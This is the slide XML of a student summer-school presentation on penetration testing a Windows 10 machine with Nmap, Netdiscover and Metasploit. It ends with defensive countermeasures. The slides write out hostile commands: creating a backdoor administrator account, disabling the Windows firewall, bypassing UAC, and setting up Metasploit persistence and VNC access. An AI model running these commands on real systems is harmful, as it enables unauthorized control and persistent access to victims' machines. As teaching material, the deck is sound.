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9" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId17"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="8229600" cy="146304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</p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Viner Hand ITC" panose="03070502030502020203" pitchFamily="66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tags" Target="../tags/tag25.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png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notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png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tags" Target="../tags/tag27.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png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tags" Target="../tags/tag26.xml"/><Relationship Id="rId2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image" Target="../media/image13.png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1013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Penetration Testing on Windows Operating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57512"/>
            <a:ext cx="7323515" cy="23293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Presented by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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, Danish Dubey </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333F70"/>
              </a:solidFill>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333F70"/>
              </a:solidFill>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-120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|| Cyber Security Summer School ||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0" y="7658100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3740" y="774581"/>
            <a:ext cx="2909320" cy="127565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9963" y="571619"/>
            <a:ext cx="13310473" cy="117824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Post-Exploitation: Information Gathering &amp; Persistence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1233" y="1369695"/>
            <a:ext cx="13310473" cy="60340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Once Meterpreter access was established, we gathered system information, dumped password hashes, and created a new administrative user for persistence.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659963" y="2160389"/>
            <a:ext cx="6561058" cy="2263497"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4848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478988" y="2160389"/>
            <a:ext cx="91440" cy="2263497"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 86613"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/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25909" y="2281555"/>
            <a:ext cx="2357080" cy="2946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User Creation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925909" y="2770624"/>
            <a:ext cx="6069806" cy="3017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net user hacker123 Password123 /add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925909" y="3266718"/>
            <a:ext cx="6069806" cy="3017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net localgroup administrators hacker123 /add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925909" y="3692962"/>
            <a:ext cx="6069806" cy="60340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Net user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="145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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="145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net localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="145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add a new administrator account for future access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7657981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2704" y="688538"/>
            <a:ext cx="7778591" cy="2438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Advanced Post-Exploitation: Firewall Bypass &amp; Remote Control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82704" y="3419475"/>
            <a:ext cx="7778591" cy="62388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To gain full control, we disabled the Windows firewall and initiated a VNC session for graphical remote access.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82704" y="4457819"/>
            <a:ext cx="2766774" cy="3048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Disabling Firewall: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682704" y="4982051"/>
            <a:ext cx="3651409" cy="916305"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8941"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673060" y="4982051"/>
            <a:ext cx="3670697" cy="916305"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3193"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868085" y="5128260"/>
            <a:ext cx="3280648" cy="62388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netsh advfirewall set allprofiles state off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82704" y="6117788"/>
            <a:ext cx="3651409" cy="12477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This command completely disables the Windows Defender Firewall, allowing unrestricted inbound and outbound connections.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4817507" y="4457819"/>
            <a:ext cx="3651409" cy="609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Enabling VNC Remote Access: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4817507" y="5286851"/>
            <a:ext cx="3651409" cy="604361"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13556"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4807863" y="5286851"/>
            <a:ext cx="3670697" cy="604361"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002887" y="5433060"/>
            <a:ext cx="3280648" cy="3119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run vnc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4817507" y="6110645"/>
            <a:ext cx="3651409" cy="12477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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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run vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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Meterpreter script deploys and starts a VNC server on the target, enabling a graphical remote desktop session via VNC Viewer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7678301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2704" y="933648"/>
            <a:ext cx="7778591" cy="2438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IN" altLang="en-US" sz="38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Viner Hand ITC" panose="03070502030502020203" charset="0"/>
                <a:cs typeface="Viner Hand ITC" panose="03070502030502020203" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Local privilege escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="3800" dirty="0">
              <a:ln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Viner Hand ITC" panose="03070502030502020203" charset="0"/>
              <a:cs typeface="Viner Hand ITC" panose="03070502030502020203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73179" y="2748280"/>
            <a:ext cx="7778591" cy="62388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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/windows/local/bypassuac_fodhelper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" alt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 algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>We use this command to bypass UAC (User Account Control) to take remote access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" alt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673100" y="4793615"/>
            <a:ext cx="6633210" cy="11487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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/windows/local/persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="19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 algn="l">
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>We use this command to create backdoor in victim system, when the victim reboot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IN" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>the system, the attacker will get the remote access automatically </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7654806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4950" y="769382"/>
            <a:ext cx="7872532" cy="495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Conclusion &amp; Countermeasures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54950" y="1386919"/>
            <a:ext cx="13520499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This project demonstrated the full life-cycle of a penetration test, from reconnaissance to post-exploitation.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It highlights the critical need for robust security practices.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554950" y="2200354"/>
            <a:ext cx="1991082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Takeaways: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554950" y="2606516"/>
            <a:ext cx="13520499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Successful demonstration of full penetration lifecycle.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554950" y="2915722"/>
            <a:ext cx="13520499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Gained access, escalated privileges, and exfiltrated data.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554950" y="3224927"/>
            <a:ext cx="13520499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Emphasized the importance of multi-layered defense.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554950" y="3803412"/>
            <a:ext cx="4495562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Essential Defense Tools &amp; Practices:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 0" descr="preencoded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554950" y="4201954"/>
            <a:ext cx="396359" cy="396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554950" y="4796433"/>
            <a:ext cx="2508885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Endpoint Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554950" y="5139333"/>
            <a:ext cx="4374713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Windows Defender, Malwarebytes,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EDR solutions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 1" descr="preencoded.png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5127784" y="4201954"/>
            <a:ext cx="396359" cy="396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127784" y="4796433"/>
            <a:ext cx="2808803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Strong Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127784" y="5139333"/>
            <a:ext cx="4374713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Complex passwords, MFA, regular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password rotations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 2" descr="preencoded.png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9700617" y="4201954"/>
            <a:ext cx="396359" cy="396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9700617" y="4796433"/>
            <a:ext cx="2130385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System Patching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9700617" y="5139333"/>
            <a:ext cx="4374713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Regular OS and software updates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to fix vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Image 3" descr="preencoded.png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554950" y="5789414"/>
            <a:ext cx="396359" cy="396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554950" y="6383893"/>
            <a:ext cx="2402443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Firewall Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554950" y="6726793"/>
            <a:ext cx="4374713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Configured firewalls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with strict inbound/outbound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rules.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Image 4" descr="preencoded.png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5127784" y="5789414"/>
            <a:ext cx="396359" cy="396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127784" y="6383893"/>
            <a:ext cx="2515553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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127784" y="6726793"/>
            <a:ext cx="4374713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Wireshark, GlassWire, NetLimiter for traffic analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554950" y="7158871"/>
            <a:ext cx="13520499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25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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7671951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3657600" y="3943985"/>
            <a:ext cx="7315200" cy="340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96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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thank You!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7657346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795"/>
            <a:ext cx="1152263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Overview and Objectives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994932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This project demonstrates a comprehensive penetration test against a Windows operating system, simulating real-world attack scenarios. Our primary goals included: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93790" y="317349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Objectives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793790" y="3983871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Assess vulnerabilities in Windows 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93790" y="5244584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Perform penetration testing and post-exploitation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93790" y="461363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Provide countermeasures to prevent such attacks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599521" y="317349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Tools Used</a:t>
            </a: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7591901" y="3980696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Kali Linux &amp; Windows 10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000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333F70"/>
              </a:solidFill>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="-120"/>
            </a:endParaRP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Nmap, Metasploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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Msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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932030" y="5210651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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7696200"/>
            <a:ext cx="14630400" cy="533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320" y="875506"/>
            <a:ext cx="13319760" cy="11699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Initial Reconnaissance: Footprinting &amp; Scanning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55320" y="2059186"/>
            <a:ext cx="13319760" cy="5991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The first step involved identifying active hosts and open ports on the target network. We used Netdiscover for host discovery and Nmap for detailed port scanning and service enumeration.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655320" y="3056096"/>
            <a:ext cx="3225641" cy="2925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Commands Executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="3559254"/>
            <a:ext cx="6431518" cy="580311"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646033" y="3559254"/>
            <a:ext cx="6450092" cy="580311"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/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833199" y="3699629"/>
            <a:ext cx="6075759" cy="2995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ip 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673894" y="5653683"/>
            <a:ext cx="6431518" cy="2995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IP a:</a:t>
            </a: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reveals the attacker's IP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655320" y="6400086"/>
            <a:ext cx="6431518" cy="2995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655320" y="6868120"/>
            <a:ext cx="6431518" cy="5991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94" y="4662567"/>
            <a:ext cx="6431518" cy="540702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0" y="7658100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320" y="905351"/>
            <a:ext cx="13319760" cy="11699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Initial Reconnaissance: Footprinting &amp; Scanning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55320" y="2059186"/>
            <a:ext cx="13319760" cy="5991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The first step involved identifying active hosts and open ports on the target network. We used Netdiscover for host discovery and Nmap for detailed port scanning and service enumeration.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655320" y="3056096"/>
            <a:ext cx="3225641" cy="2925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Commands Executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581461" y="3610035"/>
            <a:ext cx="6431518" cy="580311"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664607" y="3735288"/>
            <a:ext cx="6075759" cy="2995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netdiscover -r 192.168.1.0/24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655320" y="6400086"/>
            <a:ext cx="6431518" cy="2995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 err="1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Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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:</a:t>
            </a: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identifies live hosts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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07" y="4329378"/>
            <a:ext cx="6417587" cy="1931676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7658100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320" y="889476"/>
            <a:ext cx="13319760" cy="11699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Initial Reconnaissance: Footprinting &amp; Scanning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55320" y="2059186"/>
            <a:ext cx="13319760" cy="5991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The first step involved identifying active hosts and open ports on the target network. We used Netdiscover for host discovery and Nmap for detailed port scanning and service enumeration.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655320" y="3056096"/>
            <a:ext cx="3225641" cy="2925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Commands Executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655915" y="3559254"/>
            <a:ext cx="6450092" cy="580311"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2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13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664607" y="3674161"/>
            <a:ext cx="6075759" cy="2995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nmap -A -T4 192.168.1.100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655320" y="6868120"/>
            <a:ext cx="6431518" cy="5991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Nmap: </a:t>
            </a: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is a tool used to scan networks and discover hosts, services and vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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" y="4413289"/>
            <a:ext cx="6710362" cy="2178106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7658100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33160" y="752951"/>
            <a:ext cx="7650480" cy="13337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Target Identification and Deep Scan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33160" y="2406729"/>
            <a:ext cx="7650480" cy="6827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To confirm our target and understand its full attack surface, we performed an ARP scan and a thorough full-port scan.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233160" y="3542824"/>
            <a:ext cx="3540562" cy="3333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Target Confirmation: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233160" y="4116229"/>
            <a:ext cx="3564969" cy="661392"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222563" y="4116229"/>
            <a:ext cx="3586163" cy="661392"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435923" y="4276249"/>
            <a:ext cx="3159443" cy="341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nmap -sn 192.168.1.0/24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6233160" y="5017651"/>
            <a:ext cx="3564969" cy="661392"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
